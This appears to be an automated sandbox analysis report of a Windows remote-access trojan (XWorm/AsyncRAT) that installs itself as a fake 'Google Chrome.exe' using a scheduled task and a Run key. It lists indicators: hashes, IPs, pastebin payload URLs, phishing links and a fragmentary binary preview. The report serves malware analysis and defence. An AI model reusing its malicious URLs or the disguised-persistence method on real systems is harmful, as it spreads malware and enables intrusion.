                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:ra66DSpa.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@20/20@2/2
                              EGA Information:
                              • Successful, ratio: 11.1%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 97
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target Google Chrome.exe, PID 1456 because it is empty
                              • Execution Graph export aborted for target Google Chrome.exe, PID 1756 because it is empty
                              • Execution Graph export aborted for target Google Chrome.exe, PID 1816 because it is empty
                              • Execution Graph export aborted for target Google Chrome.exe, PID 6992 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 1948 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 2308 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 3520 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 6284 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: ra66DSpa.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              01:47:50Task SchedulerRun new task: Google Chrome path: C:\Users\user\AppData\Local\Google s>Chrome.exe
                              01:47:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Google Chrome C:\Users\user\AppData\Local\Google Chrome.exe
                              01:48:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Google Chrome C:\Users\user\AppData\Local\Google Chrome.exe
                              19:46:58API Interceptor49x Sleep call for process: powershell.exe modified
                              19:47:51API Interceptor249419x Sleep call for process: ra66DSpa.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.20.4.235sostener.vbsGet hashmaliciousNjratBrowse
                              • pastebin.com/raw/V9y5Q5vv
                              sostener.vbsGet hashmaliciousXWormBrowse
                              • pastebin.com/raw/V9y5Q5vv
                              envifa.vbsGet hashmaliciousRemcosBrowse
                              • pastebin.com/raw/V9y5Q5vv
                              New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              Update on Payment.jsGet hashmaliciousWSHRATBrowse
                              • pastebin.com/raw/NsQ5qTHr
                              147.185.221.21Q5N7WOpk8J.batGet hashmaliciousUnknownBrowse
                                NzEsfIiAc0.exeGet hashmaliciousXWormBrowse
                                  Y666Gn09a1.exeGet hashmaliciousXWormBrowse
                                    Uhj9qfwbYG.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                      WIN CHANGER 2.3.exeGet hashmaliciousXWormBrowse
                                        jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
                                          PCCooker2.0_x64.exeGet hashmaliciousAsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRatBrowse
                                            JFhDGHXmW6.exeGet hashmaliciousUnknownBrowse
                                              N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                                N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  pastebin.comtMREqVW0.exeGet hashmaliciousXWormBrowse
                                                  • 104.20.3.235
                                                  wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                  • 172.67.19.24
                                                  vb.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                  • 104.20.3.235
                                                  tYeFOUhVLd.exeGet hashmaliciousRedLineBrowse
                                                  • 104.20.3.235
                                                  SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                                  • 104.20.4.235
                                                  sostener.vbsGet hashmaliciousNjratBrowse
                                                  • 104.20.4.235
                                                  sostener.vbsGet hashmaliciousXWormBrowse
                                                  • 104.20.4.235
                                                  3.dllGet hashmaliciousUnknownBrowse
                                                  • 104.20.3.235
                                                  6.dllGet hashmaliciousUnknownBrowse
                                                  • 104.20.4.235
                                                  5.dllGet hashmaliciousUnknownBrowse
                                                  • 104.20.3.235

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUShttps://link.edgepilot.com/s/527f3b22/IsEZW0vVpU28AdY1bja1GQ?u=https://securemail.wf.com/s/e?m=ABDLG7Db88ZOC03NJzhZQA0p%26c=ABCnBKdwqhBBe4jHrIQNGJMjGet hashmaliciousUnknownBrowse
                                                  • 104.18.10.207
                                                  file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                  • 104.26.3.46
                                                  https://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80hGet hashmaliciousUnknownBrowse
                                                  • 172.64.149.46
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • 172.67.214.93
                                                  http://masdeliveryusa.com/Get hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.214.93
                                                  https://click.agilitypr.delivery/ls/click?upn=u001.eiLrPCkKKjApnPIr0I-2BsRfkpzjEGhTCoHqG09iolrdhlMYGCOo2Nd-2FxjkEBEx2ILarmVrzugxvL3mzK8oRbzmw-2Fc8MlnUZ-2Fr7oFdK8O5ZPNkRNGBT2B5w7-2BPGYsDVJaX7Ju4_CsMjdMvVCH8VnXX4Gfqu2d-2F8dUxANUAZ6i0guRxOZ16SBn-2BfWKPYCJ4k-2FRayz-2B7dgj-2Fry3pp6bh27tMOonGdCv5tjKX-2BF3xoFuSqeM2q0ggzsiKdwHoy3hTh08ynmZWbcBa2wQancmLCRha7gIvuGF-2BaYXuvGrIxnmpxoXmMm6ir51qvGKOvNKdK5IH4SYf35X5Wd-2Fs6YZWP8vKqWmGP1KToK5-2FGS-2BKn-2Bf84fcBuTdvvkjO8NEF5Bpt9hfpdVjRN-2FV0yMk97PXeyRMLgSEmwvvB4CTAjLo1gEwkG7vxhEAXXg1bNDHaxOZEzcIkoAbp8oMfK5YrMDngcc0JjC3pXeoycPv9IyLICjZ-2BgbU8HA-2BOjvDkAcylLxTWsU8lsqYTGnTfslidP4BMlB0nIxXCbcq4-2FLoVs6F-2Fhdrhdj9zy6VM-3DGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.16.117.116
                                                  https://www.google.fr/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Flink.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS0z6wG-1zBDHwJKvW2cHgWJTMQtr_VqZTDREew7RsDJjLX3Nu-hOB30y_dTACc_DC20WhJeWfQI9ldVnZg5I3l2FTVB0RS05hmGx0cQsdDkHpPzJaYyjKcdoY7HYeMLqArftV0YSw5Wm9JJrOI2mXih3-C4cj98VpbIH9I96jbo0VVbIhhGr8mn95Nnhq8dJiEDFZ2amN-vFP0KvhVNzd6bzdT0TFK8bA49IWUCbU9MGpR1lTLTQ8wGn4FQOGHcxbAFQg5aCXIk9dUPzquvqJ8d/4a7/BVRt3igITgKfI8bq35Ml_w/h94/h001.jQSqGb0rCzLfgHVmmxaOCxarjpgyicdCc0Ov4XzL60wGet hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  https://account.attributes.best/communication.aspx?now=yikes.bikes@saic.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.70.28
                                                  msvcp110.dllGet hashmaliciousLummaCBrowse
                                                  • 172.67.214.93
                                                  SALSGIVERUStMREqVW0.exeGet hashmaliciousXWormBrowse
                                                  • 147.185.221.19
                                                  wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                  • 147.185.221.22
                                                  eFvQTTtxej.exeGet hashmaliciousNjratBrowse
                                                  • 147.185.221.22
                                                  Q5N7WOpk8J.batGet hashmaliciousUnknownBrowse
                                                  • 147.185.221.21
                                                  SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                                                  • 147.185.221.22
                                                  3EtS1ncqvJ.exeGet hashmaliciousNjratBrowse
                                                  • 147.185.221.19
                                                  hfKx2T5IfT.exeGet hashmaliciousNjratBrowse
                                                  • 147.185.221.19
                                                  BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                  • 147.185.221.22
                                                  It8DXmSFEk.exeGet hashmaliciousNjratBrowse
                                                  • 147.185.221.19
                                                  6Mt223MA25.exeGet hashmaliciousArrowRATBrowse
                                                  • 147.185.221.18

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80hGet hashmaliciousUnknownBrowse
                                                  • 104.20.4.235
                                                  http://masdeliveryusa.com/Get hashmaliciousUnknownBrowse
                                                  • 104.20.4.235
                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                  • 104.20.4.235
                                                  tMREqVW0.exeGet hashmaliciousXWormBrowse
                                                  • 104.20.4.235
                                                  https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.20.4.235
                                                  wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                  • 104.20.4.235
                                                  https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845Get hashmaliciousUnknownBrowse
                                                  • 104.20.4.235
                                                  YxRMWWHAA2.exeGet hashmaliciousDCRatBrowse
                                                  • 104.20.4.235
                                                  Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.20.4.235
                                                  vb.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                  • 104.20.4.235

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Google Chrome.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\ra66DSpa.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):78848
                                                  Entropy (8bit):6.017233981963163
                                                  Encrypted:false
                                                  SSDEEP:1536:SId+Mwkxo+YjhKfK3qmVc0i+bLEf/Hk8q+OiY86dyCMpKpOBdGqkgQGM:SKX8KqqmVcb+bL6/VFPoy5KpOBbM
                                                  MD5:12AC7EECCA99175C8953B8368D96440E
                                                  SHA1:AA6FCF14C66644111D1160A6DD4CDB67C58E709A
                                                  SHA-256:9D7A88AA72820977134B39B0AE1907FD738DE184B89CE72FBB77CEE530A10E49
                                                  SHA-512:5D5F775B32182C6AAB302462A2B8E9A2D608F232DF2DC02C3826405E4A3A46EF040E8249FEAF2133DEE3ED3F111AEB4E884FDB4EDAE743DBC6E255C40EB51C9E
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Google Chrome.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Google Chrome.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..f.................(..........>F... ...`....@.. ....................................@..................................E..S....`............................................................................... ............... ..H............text...D&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc...............2..............@..B................ F......H........^..T.......&.....................................................(....*.r...p*. .(T.*..(....*.r/..p*. ....*.s.........s.........s.........s.........*.r]..p*. ~.H.*.r...p*. ..e.*.r...p*.r...p*. E/..*.r...p*. ....*..((...*.rX..p*.r...p*. .x!.*"(....+.*&(....&+.*.+5sY... .... .'..oZ...(,...~....-.(J...(<...~....o[...&.-.*.r...p*. .;..*.r ..p*. .-.*.rN..p*. ...*.r|..p*. .8F.*.r...p*. .b^.*.r...p*. ....*.r...p*. q.Z.*..............j..................s\..............~...

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Google Chrome.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................

                                                  C:\Users\user\AppData\Local\Temp\Log.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\ra66DSpa.exe
                                                  File Type:Generic INItialization configuration [WIN]
                                                  Category:dropped
                                                  Size (bytes):58
                                                  Entropy (8bit):3.598349098128234
                                                  Encrypted:false
                                                  SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                  MD5:5362ACB758D5B0134C33D457FCC002D9
                                                  SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                  SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                  SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                  Malicious:false
                                                  Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vencdyw.jvy.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5102n2bb.jwt.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dumybab.bwl.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tj2tbh4.nsl.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3tfa0wt.3ny.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhmcoxvj.u2j.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghju3ne2.ibu.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlnkectt.ope.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrpg1hu1.4bt.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyhymczd.w4p.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw1e5rw1.yfb.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmah3m25.kbw.ps1

                                                  Download File
